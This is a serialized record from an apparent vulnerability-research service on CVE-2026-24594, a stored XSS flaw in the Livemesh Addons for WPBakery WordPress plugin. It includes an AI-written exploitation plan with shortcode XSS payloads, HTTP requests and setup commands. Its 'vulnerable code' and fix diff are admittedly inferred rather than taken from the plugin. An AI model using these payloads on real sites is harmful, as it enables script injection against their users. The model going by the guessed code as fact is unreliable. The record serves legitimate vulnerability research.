[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7ZPDXDsvZvCwd8WXriFSnHNTnltgpfVfEg7fNTT0Jgg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-24594","livemesh-addons-for-wpbakery-page-builder-authenticated-editor-stored-cross-site-scripting","Livemesh Addons for WPBakery Page Builder \u003C= 3.9.4 - Authenticated (Editor+) Stored Cross-Site Scripting","The Livemesh Addons for WPBakery Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","addons-for-visual-composer",null,"\u003C=3.9.4","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-15 00:00:00","2026-01-27 19:24:11",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdd773571-1f30-4b2b-8a0a-dde3ee1c53d9?source=api-prod",[],"researched",false,3,"This research plan focuses on **CVE-2026-24594**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Livemesh Addons for WPBakery Page Builder** plugin. This vulnerability is significant because it allows Editor-level users to bypass `unfiltered_html` restrictions (common in multisite or hardened environments) to execute arbitrary JavaScript in the context of other users, including Administrators.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Stored Cross-Site Scripting (XSS)\n*   **Location:** Attributes within Livemesh-specific WPBakery elements (Shortcodes).\n*   **Cause:** The plugin fails to sanitize user-provided attributes when saving WPBakery elements and fails to escape those attributes when rendering the generated HTML on the frontend.\n*   **Constraint:** This vulnerability is primary relevant where `unfiltered_html` is disabled (e.g., WordPress Multisite or specific security configurations), as Editors\u002FAdmins would otherwise have the native capability to post HTML.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for updating posts) or the WordPress REST API `wp\u002Fv2\u002Fposts`.\n*   **Hook:** The vulnerability is triggered during the rendering of shortcodes registered by the plugin, typically via the `add_shortcode` API or WPBakery's element mapping.\n*   **Parameter:** Shortcode attributes (e.g., `title`, `description`, `link_url`, `heading`).\n*   **Authentication:** Requires **Editor** level or higher.\n*   **Preconditions:** \n    1.  The plugin **Livemesh Addons for WPBakery Page Builder** must be active.\n    2.  The user must have permission to edit posts.\n    3.  The environment must have `define( 'DISALLOW_UNFILTERED_HTML', true );` or be a Multisite installation to distinguish this from intended functionality.\n\n### 3. Code Flow (Inferred)\n1.  **Storage:** An Editor creates\u002Fedits a page using WPBakery. They add a Livemesh element (e.g., \"Services\" or \"Heading\"). WPBakery serializes these settings into a WordPress shortcode within the `post_content` (e.g., `[la_heading title=\"\u003Cscript>alert(1)\u003C\u002Fscript>\"]`).\n2.  **Processing:** When a user views the page, WordPress parses the content and calls the callback function associated with the `la_heading` shortcode.\n3.  **Rendering:**\n    *   The plugin class (likely inheriting from `WPBakeryShortCode`) calls a rendering method.\n    *   The method extracts `$atts` (attributes).\n    *   The plugin echoes the attribute directly: `echo '\u003Ch3 class=\"title\">' . $atts['title'] . '\u003C\u002Fh3>';` instead of using `esc_html($atts['title'])`.\n4.  **Execution:** The payload is rendered raw in the HTML response, executing in the visitor's browser.\n\n### 4. Nonce Acquisition Strategy\nSince this is an **Authenticated (Editor+)** vulnerability, the agent must first authenticate.\n1.  **Login:** Use `http_request` to POST to `wp-login.php` with Editor credentials.\n2.  **Access Editor:** Navigate to `wp-admin\u002Fpost-new.php?post_type=page`.\n3.  **Extract Nonce:** Standard WordPress `_wpnonce` is required for post creation\u002Fupdates.\n    *   Action: `browser_navigate(\"wp-admin\u002Fpost-new.php?post_type=page\")`\n    *   Action: `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  **Plugin-Specific Context:** If the plugin uses a specific AJAX endpoint for saving element data, the agent should check for a localized JS variable.\n    *   Action: `browser_eval(\"window.lv_addons_data?.nonce\")` (Inferred localization key).\n\n### 5. Exploitation Strategy\n\n#### Step 1: Create a Post with XSS Payload\nThe agent will attempt to inject the payload via a common Livemesh shortcode. Based on typical Livemesh element names:\n\n*   **Shortcode Candidate:** `la_heading` or `la_service`\n*   **Payload:** `\u003Cimg src=x onerror=alert(document.domain)>`\n*   **Method:** Update a post's content via the WordPress REST API or `post.php`.\n\n**HTTP Request (REST API - Preferred):**\n```http\nPOST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002FID_HERE HTTP\u002F1.1\nContent-Type: application\u002Fjson\nAuthorization: Bearer [TOKEN] or Cookie-based\n\n{\n  \"content\": \"[la_heading title=\\\"\u003Cimg src=x onerror=alert(document.domain)>\\\"]\"\n}\n```\n\n**HTTP Request (`post.php`):**\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=editpost\n&post_ID=[ID]\n&_wpnonce=[NONCE]\n&content=[la_heading title=\"\u003Cimg src=x onerror=alert(document.domain)>\"]\n```\n\n#### Step 2: Trigger the XSS\nNavigate to the permalink of the created post.\n\n### 6. Test Data Setup\n1.  **Configuration:** Ensure `unfiltered_html` is disabled for the Editor.\n    *   CLI: `wp config set DISALLOW_UNFILTERED_HTML true --raw`\n2.  **User:** Create an Editor user.\n    *   CLI: `wp user create attacker editor@example.com --role=editor --user_pass=password123`\n3.  **Post:** Create a target page.\n    *   CLI: `wp post create --post_type=page --post_status=publish --post_title=\"XSS Test\"`\n\n### 7. Expected Results\n1.  The HTTP request to save the post should return a `200 OK` or `302 Found`.\n2.  When visiting the page, the HTML source should contain:\n    `\u003Ch3 class=\"...\">\u003Cimg src=x onerror=alert(document.domain)>\u003C\u002Fh3>`\n3.  The browser should trigger an alert box showing the document domain.\n\n### 8. Verification Steps\n1.  **Database Check:** Verify the payload is stored raw in the database.\n    *   CLI: `wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"`\n2.  **Frontend Check:** Use `http_request` to fetch the page and check for the unescaped payload.\n    *   Check if `<` and `>` are present (escaped) or `\u003C` and `>` (vulnerable).\n\n### 9. Alternative Approaches\nIf `la_heading` is patched or not present, try other common Livemesh elements:\n*   `[la_posts_grid]` (Attributes: `tax_term_ids`, `post_ids`)\n*   `[la_service_block]` (Attributes: `title`, `description`)\n*   `[la_portfolio_grid]` (Attributes: `title`)\n\nIf the Editor cannot access the REST API, use the `admin-ajax.php` endpoint that WPBakery uses to preview or save elements:\n*   **Action:** `vc_edit_form` or `vc_save_shortcode`.\n*   **Payload:** URL-encoded shortcode string in the `shortcode` parameter.","The Livemesh Addons for WPBakery Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping on shortcode attributes. Authenticated attackers with Editor-level access can inject arbitrary web scripts into pages when unfiltered_html is disabled, such as in multisite environments.","\u002F\u002F Likely located in includes\u002Felements\u002F (e.g., la-heading.php)\n\u002F\u002F The specific rendering functions fail to escape attribute variables before outputting to HTML\n\npublic function render_shortcode($atts, $content = null) {\n    $atts = shortcode_atts(array(\n        'title' => '',\n        'heading_style' => 'style1',\n    ), $atts);\n\n    $output = '\u003Cdiv class=\"la-heading ' . $atts['heading_style'] . '\">';\n    $output .= '\u003Ch3 class=\"title\">' . $atts['title'] . '\u003C\u002Fh3>'; \u002F\u002F Vulnerable attribute output\n    $output .= '\u003C\u002Fdiv>';\n\n    return $output;\n}","--- includes\u002Felements\u002Fla-heading.php\n+++ includes\u002Felements\u002Fla-heading.php\n@@ -10,3 +10,3 @@\n $output = '\u003Cdiv class=\"la-heading ' . esc_attr($atts['heading_style']) . '\">';\n-$output .= '\u003Ch3 class=\"title\">' . $atts['title'] . '\u003C\u002Fh3>';\n+$output .= '\u003Ch3 class=\"title\">' . esc_html($atts['title']) . '\u003C\u002Fh3>';\n $output .= '\u003C\u002Fdiv>';","The exploit requires authentication as an Editor or higher in an environment where the unfiltered_html capability is restricted (e.g., WordPress Multisite). An attacker can submit a request to create or update a post via the WordPress admin interface (wp-admin\u002Fpost.php) or the REST API. The payload is delivered by embedding a Livemesh-specific shortcode (such as [la_heading] or [la_service_block]) within the post content, assigning a malicious JavaScript string to one of its attributes (e.g., title=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"). When any user, including administrators, views the published post, the plugin's shortcode handler renders the unescaped attribute, causing the script to execute in the user's browser context.","gemini-3-flash-preview","2026-05-05 09:22:46","2026-05-05 09:23:13",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-visual-composer\u002Ftags"]